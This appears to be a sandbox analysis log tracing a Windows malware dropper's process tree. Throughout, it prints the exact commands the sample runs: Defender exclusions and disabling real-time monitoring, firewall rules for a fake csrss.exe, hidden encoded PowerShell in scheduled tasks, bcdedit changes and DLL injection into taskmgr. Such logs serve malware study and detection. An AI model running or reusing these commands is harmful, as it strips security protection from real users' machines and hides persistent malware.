C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\57ed1aa9bb3827fb3ce2ced5cf5e45b442388031c52db6d0b602497641eab20d.exe" -Force2⤵PID:2024
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"2⤵
- Drops startup file
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Users\Admin\Pictures\3abumA8EPhmpkupXkwlsWKNH.exe"C:\Users\Admin\Pictures\3abumA8EPhmpkupXkwlsWKNH.exe" --silent --allusers=03⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1872
-
-
C:\Users\Admin\Pictures\lhuGc8cD8YBgMslw3CZs4Nqs.exe"C:\Users\Admin\Pictures\lhuGc8cD8YBgMslw3CZs4Nqs.exe"3⤵PID:544
-
C:\Users\Admin\Pictures\lhuGc8cD8YBgMslw3CZs4Nqs.exe"C:\Users\Admin\Pictures\lhuGc8cD8YBgMslw3CZs4Nqs.exe"4⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:884 -
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:2840
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:2616
-
-
-
-
-
C:\Users\Admin\Pictures\Fku5AId0LuZ4E8yzod75BtEi.exe"C:\Users\Admin\Pictures\Fku5AId0LuZ4E8yzod75BtEi.exe" /VERYSILENT3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2340 -
C:\Users\Admin\AppData\Local\Temp\is-IRA4F.tmp\Fku5AId0LuZ4E8yzod75BtEi.tmp"C:\Users\Admin\AppData\Local\Temp\is-IRA4F.tmp\Fku5AId0LuZ4E8yzod75BtEi.tmp" /SL5="$C011C,831488,831488,C:\Users\Admin\Pictures\Fku5AId0LuZ4E8yzod75BtEi.exe" /VERYSILENT4⤵PID:700
-
-
-
C:\Users\Admin\Pictures\OQrMVozqayLadUiGGxpM2SWK.exe"C:\Users\Admin\Pictures\OQrMVozqayLadUiGGxpM2SWK.exe"3⤵
- Executes dropped EXE
PID:1852
-
-
C:\Users\Admin\Pictures\Btpmb8l6OLnsIVBHYXzcfv46.exe"C:\Users\Admin\Pictures\Btpmb8l6OLnsIVBHYXzcfv46.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2956
-
-
C:\Users\Admin\Pictures\Ahzn2Szwr26hfrPXyZRPFZkG.exe"C:\Users\Admin\Pictures\Ahzn2Szwr26hfrPXyZRPFZkG.exe"3⤵PID:540
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1296
-
-
-
C:\Users\Admin\Pictures\wxzSv0RPCLFiIJpPm8GSlIWp.exe"C:\Users\Admin\Pictures\wxzSv0RPCLFiIJpPm8GSlIWp.exe" PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA==3⤵
- Executes dropped EXE
PID:1716
-
-
-
C:\Windows\system32\makecab.exe"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240204034220.log C:\Windows\Logs\CBS\CbsPersist_20240204034220.cab1⤵PID:1764
-
C:\Users\Admin\Pictures\Ahzn2Szwr26hfrPXyZRPFZkG.exe"C:\Users\Admin\Pictures\Ahzn2Szwr26hfrPXyZRPFZkG.exe"1⤵
- Windows security bypass
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1520 -
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"2⤵
- Suspicious use of WriteProcessMemory
PID:1256
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2156 -
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v3⤵
- Modifies boot configuration data using bcdedit
PID:300
-
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F3⤵
- Creates scheduled task(s)
PID:2392
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"3⤵
- Executes dropped EXE
PID:2848 -
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)4⤵PID:1732
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS3DCB.tmp\Install.exe.\Install.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2960 -
C:\Users\Admin\AppData\Local\Temp\7zS4598.tmp\Install.exe.\Install.exe /mGaXdidI "385118" /S2⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Checks for any installed AV software in registry
- Drops file in System32 directory
- Enumerates system info in registry
PID:2556 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gheXiYzEa" /SC once /ST 02:18:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:2592
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gheXiYzEa"3⤵PID:1836
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gheXiYzEa"3⤵PID:2540
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bwKBwqZYjkqxftWshF" /SC once /ST 03:43:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt\NQONvMOpkwRLZMC\eYLayuZ.exe\" cj /jtsite_idcNK 385118 /S" /V1 /F3⤵
- Creates scheduled task(s)
PID:2580
-
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes1⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
PID:2844
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&1⤵PID:2900
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:642⤵PID:1968
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:322⤵PID:3020
-
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&1⤵PID:1056
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:642⤵PID:2072
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:322⤵PID:2112
-
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F1⤵
- Creates scheduled task(s)
PID:2772
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:1628
-
C:\Windows\system32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f1⤵PID:348
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"1⤵PID:2768
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"1⤵PID:2928
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2596
-
C:\Windows\system32\taskeng.exetaskeng.exe {2DF579F3-DC69-48EC-9E03-60B99B134EC0} S-1-5-21-3818056530-936619650-3554021955-1000:SFVRQGEO\Admin:Interactive:[1]1⤵PID:2332
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1988 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1176
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:452 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1092
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵PID:3056
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2520
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:1672 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1272
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2380
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -Embedding1⤵PID:3020
-
C:\Windows\system32\taskeng.exetaskeng.exe {3565A2E0-9A18-4148-AC3A-1D876DF201BF} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:3064
-
C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt\NQONvMOpkwRLZMC\eYLayuZ.exeC:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt\NQONvMOpkwRLZMC\eYLayuZ.exe cj /jtsite_idcNK 385118 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:2268 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gRVicEdMr" /SC once /ST 00:53:53 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1136
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gRVicEdMr"3⤵PID:496
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gRVicEdMr"3⤵PID:2172
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:696
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gizzjgiJB" /SC once /ST 00:47:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1600
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gizzjgiJB"3⤵PID:2692
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1444
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:1624
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gizzjgiJB"3⤵PID:2900
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:643⤵PID:1828
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1504
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:643⤵PID:1744
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\RZfGRCgJsrDIEOco\gOvGNKio\bEiwlcTrlGCrRBtN.wsf"3⤵
- Modifies data under HKEY_USERS
PID:1660 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IoHaAJhEDYhU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1876
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hgFvgKbJayUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2236
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2616
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IoHaAJhEDYhU2" /t REG_DWORD /d 0 /reg:644⤵PID:2620
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hgFvgKbJayUn" /t REG_DWORD /d 0 /reg:324⤵PID:1692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR" /t REG_DWORD /d 0 /reg:644⤵PID:1724
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt" /t REG_DWORD /d 0 /reg:324⤵PID:1504
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:644⤵PID:2344
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:324⤵PID:332
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt" /t REG_DWORD /d 0 /reg:644⤵PID:1136
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵PID:2880
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵PID:1084
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\uqeRQcQeSVSWnHVB" /t REG_DWORD /d 0 /reg:644⤵PID:472
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\uqeRQcQeSVSWnHVB" /t REG_DWORD /d 0 /reg:324⤵PID:2448
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hgFvgKbJayUn" /t REG_DWORD /d 0 /reg:644⤵PID:2004
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\RZfGRCgJsrDIEOco\JZwkkdJX\nHMdFzJ.dll",#1 /GXsite_idqnL 3851185⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2900

C:\Windows\SysWOW64\schtasks.exe (level 6)
  schtasks /DELETE /F /TN "EtrQGzrpWMpnyWxNE"
  PID:1328

C:\Windows\SysWOW64\reg.exe (level 4)
  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR" /t REG_DWORD /d 0 /reg:32
  PID:2812

C:\Windows\SysWOW64\reg.exe (level 4)
  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KCGdmeQdU" /t REG_DWORD /d 0 /reg:64
  PID:2688

C:\Windows\SysWOW64\reg.exe (level 4)
  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KCGdmeQdU" /t REG_DWORD /d 0 /reg:32
  PID:3068

C:\Windows\SysWOW64\reg.exe (level 4)
  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IoHaAJhEDYhU2" /t REG_DWORD /d 0 /reg:32
  PID:1920

C:\Windows\SysWOW64\reg.exe (level 4)
  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FohpjzYDshfCC" /t REG_DWORD /d 0 /reg:64
  PID:2072

C:\Windows\SysWOW64\reg.exe (level 4)
  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FohpjzYDshfCC" /t REG_DWORD /d 0 /reg:32
  PID:2940

C:\Windows\SysWOW64\reg.exe (level 4)
  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:64
  - Windows security bypass
  PID:2784

C:\Windows\SysWOW64\reg.exe (level 4)
  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RZfGRCgJsrDIEOco" /t REG_DWORD /d 0 /reg:32
  - Windows security bypass
  PID:2692

C:\Windows\SysWOW64\reg.exe (level 4)
  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt" /t REG_DWORD /d 0 /reg:32
  - Windows security bypass
  PID:2540

C:\Windows\SysWOW64\reg.exe (level 4)
  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
  - Windows security bypass
  PID:2352

C:\Windows\SysWOW64\reg.exe (level 4)
  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
  PID:2696

C:\Windows\SysWOW64\reg.exe (level 5)
  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
  PID:1160

C:\Windows\SysWOW64\reg.exe (level 4)
  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\uqeRQcQeSVSWnHVB" /t REG_DWORD /d 0 /reg:64
  - Windows security bypass
  PID:2884

C:\Windows\SysWOW64\reg.exe (level 4)
  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\uqeRQcQeSVSWnHVB" /t REG_DWORD /d 0 /reg:32
  - Windows security bypass
  PID:2928

C:\Windows\SysWOW64\reg.exe (level 4)
  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hgFvgKbJayUn" /t REG_DWORD /d 0 /reg:32
  - Windows security bypass
  PID:2084

C:\Windows\SysWOW64\reg.exe (level 4)
  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR" /t REG_DWORD /d 0 /reg:64
  - Windows security bypass
  PID:3004

C:\Windows\SysWOW64\reg.exe (level 4)
  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR" /t REG_DWORD /d 0 /reg:32
  - Windows security bypass
  PID:1432

C:\Windows\SysWOW64\reg.exe (level 4)
  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KCGdmeQdU" /t REG_DWORD /d 0 /reg:64
  - Windows security bypass
  PID:1704

C:\Windows\SysWOW64\reg.exe (level 4)
  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KCGdmeQdU" /t REG_DWORD /d 0 /reg:32
  - Windows security bypass
  PID:764

C:\Windows\SysWOW64\reg.exe (level 4)
  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IoHaAJhEDYhU2" /t REG_DWORD /d 0 /reg:32
  - Windows security bypass
  PID:2196

C:\Windows\SysWOW64\reg.exe (level 4)
  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FohpjzYDshfCC" /t REG_DWORD /d 0 /reg:64
  - Windows security bypass
  - Drops file in Windows directory
  PID:1764

C:\Windows\SysWOW64\reg.exe (level 4)
  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FohpjzYDshfCC" /t REG_DWORD /d 0 /reg:32
  - Windows security bypass
  PID:1344
C:\Windows\SysWOW64\schtasks.exe (level 3)
  schtasks /run /I /tn "gixFxBcFZ"
  PID:1452

C:\Windows\SysWOW64\schtasks.exe (level 3)
